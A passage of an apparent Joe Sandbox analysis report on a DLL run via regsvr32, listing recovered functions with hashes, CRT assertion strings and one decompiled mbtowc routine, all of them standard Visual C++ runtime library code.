                                • API String ID: 2123368286-1420200500
                                • Opcode ID: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                • Instruction ID: 80c7b19323cb8e8402763de004709ed27ed9fdf882d4b7b175d6de3bd1baee6a
                                • Opcode Fuzzy Hash: cc07cef64c5b8afb013f442fd59d1430f3c77c8b5aa073aebe04f881c7874d42
                                • Instruction Fuzzy Hash: CDF13A32A0CB8A89EBA08B14E84576EA7E0F385795FA04535D6DD43BE8DB7ED044CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3C30D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 231COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_argwctomb_s
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 2560055391-3497434347
                                • Opcode ID: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                • Instruction ID: 0908f7725f90b5cc69585d97bf8e44ac8e860db6174f4101cd143eaefdb7169b
                                • Opcode Fuzzy Hash: 667eef7f1f49c1d82be4abe5f7b2b6c0360aabec3e49fa9d9e3a648fddbc0f41
                                • Instruction Fuzzy Hash: 87C11C72A0C7C686E7B1DB64E8457BEB7E4F384785F604025DAC886AA9DB7DE540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D39290 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 142COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno$_invalid_parameter
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_lseeki64$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\lseeki64.c
                                • API String ID: 747159061-1442092225
                                • Opcode ID: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                • Instruction ID: ad53dfe6714ab654120e1b154ee45b7e90274128f767a3acb20d12471acdd345
                                • Opcode Fuzzy Hash: 14faf06f4b776b3818928093306a4898f737286e5044e20a730c767404cf7ae4
                                • Instruction Fuzzy Hash: AE617C72A1C646CAE7909B25EC4076E72E1F780765F604725E6ED47AF9DB3EE440CB00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2B12B Relevance: 21.1, APIs: 3, Strings: 9, Instructions: 99COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _exit_invoke_watson_if_error_invoke_watson_if_oneof
                                • String ID: Module: $(*_errno())$...$Debug %s!Program: %s%s%s%s%s%s%s%s%s%s%s%s(Press Retry to debug the application)$Microsoft Visual C++ Debug Library$_CrtDbgReport: String too long or IO Error$__crtMessageWindowA$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\dbgrpt.c$strcpy_s(szOutMessage, 4096, "_CrtDbgReport: String too long or IO Error")
                                • API String ID: 1778837556-2487400587
                                • Opcode ID: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                • Instruction ID: a9706cbd1d0bc1ca6f0e01aa99e4221a5492a8f84fcd1c14ee91e7fca0fd8dc0
                                • Opcode Fuzzy Hash: 1725f90675b356b8c96096f206fe05692ea700145f07fa5ff60a00d667238266
                                • Instruction Fuzzy Hash: 5351D376608BC191E774DB18E8803EEB3E1F788384F604126EACD43AA9DB7ED154CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3C435 Relevance: 19.6, APIs: 6, Strings: 5, Instructions: 307COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameterwctomb_s
                                • String ID: ("Incorrect format specifier", 0)$-$_output_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 83251219-3442986447
                                • Opcode ID: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                • Instruction ID: afb1911e3f8ba5d231fe6bb84017af69377ca2ae416e2d0ba459e573d29e7d3a
                                • Opcode Fuzzy Hash: a7736ae2d77719cf8dd033ea8b01e94f48993e2d03ef0b45187a851eb092d1a4
                                • Instruction Fuzzy Hash: 0BF1C87260CBC186E7B1CB25E8947AEB7E4E384785F604125EACD87AA9DB7DD540CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D407C0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(filedes) & FOPEN)$(filedes >= 0 && (unsigned)filedes < (unsigned)_nhandle)$_commit$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\commit.c
                                • API String ID: 2123368286-2816485415
                                • Opcode ID: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                • Instruction ID: 498ed5c56ac792471b44c6766317b9cb43c4201113c662a7075568a19f5733c1
                                • Opcode Fuzzy Hash: a09a08489fcfa17bf46b80f7bccdd7250e5da7b82fa925d7c8e71ba256914943
                                • Instruction Fuzzy Hash: 0E617B72A1D64686EB909B28EC4176E73E1F780354F608225E6DE47AF5D77EE400CF02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D40A20 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 135COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: __doserrno$_invalid_parameter
                                • String ID: ("Invalid file descriptor. File possibly closed by a different thread",0)$(_osfile(fh) & FOPEN)$(fh >= 0 && (unsigned)fh < (unsigned)_nhandle)$_close$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\close.c
                                • API String ID: 747159061-2992490823
                                • Opcode ID: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                • Instruction ID: b3e96d9819a7910145883aa8d7fc7971cc91d039debb2f2cb13e78280c4cdede
                                • Opcode Fuzzy Hash: 31e6f22f94a5a332f8c1da309800fd96aa675ce4ff76475566f44e9374f3c210
                                • Instruction Fuzzy Hash: 2F516B71A186468AE7909B69EC8176E73E2F380758F608621E2DD476F5D77EE400CF02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3E2FC Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 231COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~__get_printf_count_output_invalid_parameterget_int64_arg
                                • String ID: ("'n' format specifier disabled", 0)$("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1328470723-1899493600
                                • Opcode ID: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                • Instruction ID: a75f166a54a10c782c9e5936c38e4db03d9624ec2b4b775b3bb68b676b0f6840
                                • Opcode Fuzzy Hash: 66637f3263954389c4faca3e64166f48d89120a2e65f09c6e12548c2e7ae54a3
                                • Instruction Fuzzy Hash: 38C10D72A0CAC286E7B19B55E8447AFB7E0F384346F604125E6C987AE9DB7DE444CF10
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2EFB0 Relevance: 16.7, APIs: 11, Instructions: 200memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide$AllocaMarkStringmalloc
                                • String ID:
                                • API String ID: 2352934578-0
                                • Opcode ID: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                • Instruction ID: 07e98e5d3e74dc1edba9ed484819fff5a1f4d1c282268086727bfc73f0da1f11
                                • Opcode Fuzzy Hash: c62487d166d7dca86c557c7a35fedf321effa742b468bc4a62d127ec3f3969a5
                                • Instruction Fuzzy Hash: E8B1D73690C7818AE7A0CB5AE84476FB7E0F789754F214525EAC983BA8DB7ED444CF40
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D33380 Relevance: 16.1, APIs: 3, Strings: 6, Instructions: 330COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcsncpy_s.inl$wcsncpy_s
                                • API String ID: 2123368286-322314505
                                • Opcode ID: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                • Instruction ID: 4ea1f2baf56cb797ddf9edfbcd87f382fde430b96fb790801732b827a7e5f6be
                                • Opcode Fuzzy Hash: 399a9458fa01abea37a4ed0ff3a6319967a0ea4a6e471ce5995f41885ca75c61
                                • Instruction Fuzzy Hash: 02023E32A0CB8585EBF09B29E94476EA3E0F385795F604625D6DD83BE5DF3ED0848B01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3E424 Relevance: 16.1, APIs: 5, Strings: 4, Instructions: 307COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: DecodePointer$Locale$UpdateUpdate::~__invalid_parameter
                                • String ID: ("Incorrect format specifier", 0)$_woutput_s_l$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\output.c
                                • API String ID: 1139040907-3988320827
                                • Opcode ID: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                • Instruction ID: be767cf373226b306d5cc4d655a52930cc25a89ebff261bf8d2d4167a1edb2b7
                                • Opcode Fuzzy Hash: 2dc7b4f9e3ef16c46f4c156222616883407f9e483511c99d0d30e534b880734d
                                • Instruction Fuzzy Hash: 48F1DA72A0CAC18AE7A08B55E8407AFB7E0F7C5756F600126E6CD87AA9DB7DD440CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D31640 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 233COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInWords)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$wcscpy_s
                                • API String ID: 2123368286-3300880850
                                • Opcode ID: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                • Instruction ID: 4116fe211f4ce550b5db6f2beda9aad957ea61137f05a11edd57804cc24ee7cf
                                • Opcode Fuzzy Hash: 5aefbc8f1d73eb7cfc6612018eacf67af3b13798598c0c57764cabda027a92b3
                                • Instruction Fuzzy Hash: A4C14B31A0DB8685EBB08B29E84476E63E4F385795F608235D6DD43BA5DF7ED084CB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D2D490 Relevance: 16.0, APIs: 3, Strings: 6, Instructions: 228COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: _invalid_parameter
                                • String ID: (((_Src))) != NULL$((_Dst)) != NULL && ((_SizeInBytes)) > 0$(L"Buffer is too small" && 0)$Buffer is too small$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\tcscpy_s.inl$strcpy_s
                                • API String ID: 2123368286-3045918802
                                • Opcode ID: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                • Instruction ID: 83c83e0f84f27b13c419585d1e3107a86c1b002b2dbb410691c45864cb0988c3
                                • Opcode Fuzzy Hash: 3a73121abd8cd92c4d24009a6c05b63160c008938b58f8c852a28b4bc1f5a78a
                                • Instruction Fuzzy Hash: 3AC13D3190DB8A85EBA08B19E84436EA3E0F386794F614135D6DE43BB5DF7ED448CB11
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000007FEF9D3F000 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 15%
                                			E000007FE7FEF9D3F000(long long __rcx, signed char* __rdx, long long __r8, long long __r9, long long _a8, signed char* _a16, long long _a24, long long _a32) {
				intOrPtr _v24;
				long long _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				char _v88;
				intOrPtr _v96;
				long long _v104;
				void* _t80;
				void* _t81;
				void* _t89;
				void* _t92;
				intOrPtr _t102;
				intOrPtr* _t136;
				intOrPtr* _t137;
				intOrPtr* _t139;
				signed char* _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				intOrPtr* _t144;
				intOrPtr* _t148;
				intOrPtr* _t149;

				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				if (_a16 == 0) goto 0xf9d3f031;
				if (_a24 != 0) goto 0xf9d3f038;
				goto 0xf9d3f31a;
				_t136 = _a16;
				if ( *_t136 != 0) goto 0xf9d3f066;
				if (_a8 == 0) goto 0xf9d3f05f;
				 *_a8 = 0;
				goto 0xf9d3f31a;
				0xf9d266b0();
				_t80 = E000007FE7FEF9D26840(0,  &_v88);
				_t137 =  *_t136;
				if ( *((intOrPtr*)(_t137 + 0x10c)) == 1) goto 0xf9d3f0d2;
				_t81 = E000007FE7FEF9D26840(_t80,  &_v88);
				if ( *((intOrPtr*)( *_t137 + 0x10c)) == 2) goto 0xf9d3f0d2;
				_t139 = L"_loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2";
				_v104 = _t139;
				r9d = 0;
				r8d = 0x47;
				0xf9d2b3b0();
				if (_t81 != 1) goto 0xf9d3f0d2;
				asm("int3");
				E000007FE7FEF9D26840(0,  &_v88);
				if ( *((intOrPtr*)( *_t139 + 0x14)) != 0) goto 0xf9d3f121;
				if (_a8 == 0) goto 0xf9d3f106;
				_t141 = _a16;
				 *_a8 =  *_t141 & 0x000000ff;
				_v56 = 1;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				E000007FE7FEF9D26840(_v56,  &_v88);
				if (E000007FE7FEF9D32B90( *_a16 & 0x000000ff, _t141, _t141) == 0) goto 0xf9d3f276;
				_t89 = E000007FE7FEF9D26840(_t88,  &_v88);
				_t142 =  *_t141;
				if ( *((intOrPtr*)(_t142 + 0x10c)) - 1 <= 0) goto 0xf9d3f1f3;
				E000007FE7FEF9D26840(_t89,  &_v88);
				_t143 =  *_t142;
				if (_a24 -  *((intOrPtr*)(_t143 + 0x10c)) < 0) goto 0xf9d3f1f3;
				if (_a8 == 0) goto 0xf9d3f191;
				_v36 = 1;
				goto 0xf9d3f199;
				_v36 = 0;
				_t92 = E000007FE7FEF9D26840( *((intOrPtr*)(_t143 + 0x10c)),  &_v88);
				_t144 =  *_t143;
				_v32 = _t144;
				E000007FE7FEF9D26840(_t92,  &_v88);
				_v96 = _v36;
				_v104 = _a8;
				r9d =  *((intOrPtr*)(_v32 + 0x10c));
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f247;
				E000007FE7FEF9D26840(_t94,  &_v88);
				if (_a24 -  *((intOrPtr*)( *((intOrPtr*)( *_t144)) + 0x10c)) < 0) goto 0xf9d3f221;
				_t148 = _a16;
				if ( *((char*)(_t148 + 1)) != 0) goto 0xf9d3f247;
				0xf9d2ab30();
				 *_t148 = 0x2a;
				_v52 = 0xffffffff;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				E000007FE7FEF9D26840(_v52,  &_v88);
				_t149 =  *_t148;
				_v48 =  *((intOrPtr*)(_t149 + 0x10c));
				E000007FE7FEF9D26800( &_v88);
				_t102 = _v48;
				goto 0xf9d3f310;
				if (_a8 == 0) goto 0xf9d3f28b;
				_v24 = 1;
				goto 0xf9d3f293;
				_v24 = 0;
				E000007FE7FEF9D26840(_t102,  &_v88);
				_v96 = _v24;
				_v104 = _a8;
				r9d = 1;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0xf9d3f2f8;
				0xf9d2ab30();
				 *((intOrPtr*)( *_t149)) = 0x2a;
				_v44 = 0xffffffff;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				_v40 = 1;
				E000007FE7FEF9D26800( &_v88);
				goto 0xf9d3f31a;
				return E000007FE7FEF9D26800( &_v88);
			}




























                                0x7fef9d3f000
                                0x7fef9d3f005
                                0x7fef9d3f00a
                                0x7fef9d3f00f
                                0x7fef9d3f024
                                0x7fef9d3f02f
                                0x7fef9d3f033
                                0x7fef9d3f038
                                0x7fef9d3f045
                                0x7fef9d3f050
                                0x7fef9d3f05c
                                0x7fef9d3f061
                                0x7fef9d3f073
                                0x7fef9d3f07d
                                0x7fef9d3f082
                                0x7fef9d3f08c
                                0x7fef9d3f093
                                0x7fef9d3f0a2
                                0x7fef9d3f0a4
                                0x7fef9d3f0ab
                                0x7fef9d3f0b0
                                0x7fef9d3f0b3
                                0x7fef9d3f0c5
                                0x7fef9d3f0cd
                                0x7fef9d3f0cf
                                0x7fef9d3f0d7
                                0x7fef9d3f0e3
                                0x7fef9d3f0ee
                                0x7fef9d3f0f0
                                0x7fef9d3f103
                                0x7fef9d3f106
                                0x7fef9d3f113
                                0x7fef9d3f11c
                                0x7fef9d3f126
                                0x7fef9d3f140
                                0x7fef9d3f14b
                                0x7fef9d3f150
                                0x7fef9d3f15a
                                0x7fef9d3f165
                                0x7fef9d3f16a
                                0x7fef9d3f17a
                                0x7fef9d3f185
                                0x7fef9d3f187
                                0x7fef9d3f18f
                                0x7fef9d3f191
                                0x7fef9d3f19e
                                0x7fef9d3f1a3
                                0x7fef9d3f1a6
                                0x7fef9d3f1b0
                                0x7fef9d3f1bc
                                0x7fef9d3f1c8
                                0x7fef9d3f1d2
                                0x7fef9d3f1f1
                                0x7fef9d3f1f8
                                0x7fef9d3f20f
                                0x7fef9d3f211
                                0x7fef9d3f21f
                                0x7fef9d3f221
                                0x7fef9d3f226
                                0x7fef9d3f22c
                                0x7fef9d3f239
                                0x7fef9d3f242
                                0x7fef9d3f24c
                                0x7fef9d3f251
                                0x7fef9d3f25a
                                0x7fef9d3f263
                                0x7fef9d3f268
                                0x7fef9d3f271
                                0x7fef9d3f27f
                                0x7fef9d3f281
                                0x7fef9d3f289
                                0x7fef9d3f28b
                                0x7fef9d3f298
                                0x7fef9d3f2a4
                                0x7fef9d3f2b0
                                0x7fef9d3f2b5
                                0x7fef9d3f2d3
                                0x7fef9d3f2d5
                                0x7fef9d3f2da
                                0x7fef9d3f2e0
                                0x7fef9d3f2ed
                                0x7fef9d3f2f6
                                0x7fef9d3f2f8
                                0x7fef9d3f305
                                0x7fef9d3f30e
                                0x7fef9d3f321

                                APIs
                                Strings
                                • _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2, xrefs: 000007FEF9D3F0A4
                                • f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c, xrefs: 000007FEF9D3F0B9
                                Memory Dump Source
                                • Source File: 00000003.00000002.926879191.000007FEF9D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 000007FEF9D20000, based on PE: true
                                • Associated: 00000003.00000002.926872386.000007FEF9D20000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926902888.000007FEF9D42000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926912202.000007FEF9D4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.926917238.000007FEF9D4F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_7fef9d20000_regsvr32.jbxd
                                Similarity
                                • API ID: Locale$UpdateUpdate::~_$ByteCharMultiWide
                                • String ID: _loc_update.GetLocaleT()->locinfo->mb_cur_max == 1 || _loc_update.GetLocaleT()->locinfo->mb_cur_max == 2$f:\dd\vctools\crt_bld\self_64_amd64\crt\src\mbtowc.c
                                • API String ID: 3162172745-1617866167
                                • Opcode ID: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
                                • Instruction ID: e2321dfd7d4ce97f8464894d094ef21069f5ab619bd2151a5dc0ee19d75eafe6
                                • Opcode Fuzzy Hash: c1274c363911339d648a95bedd1909bdcc319eff7e23c8a9712c300a8ba53b59
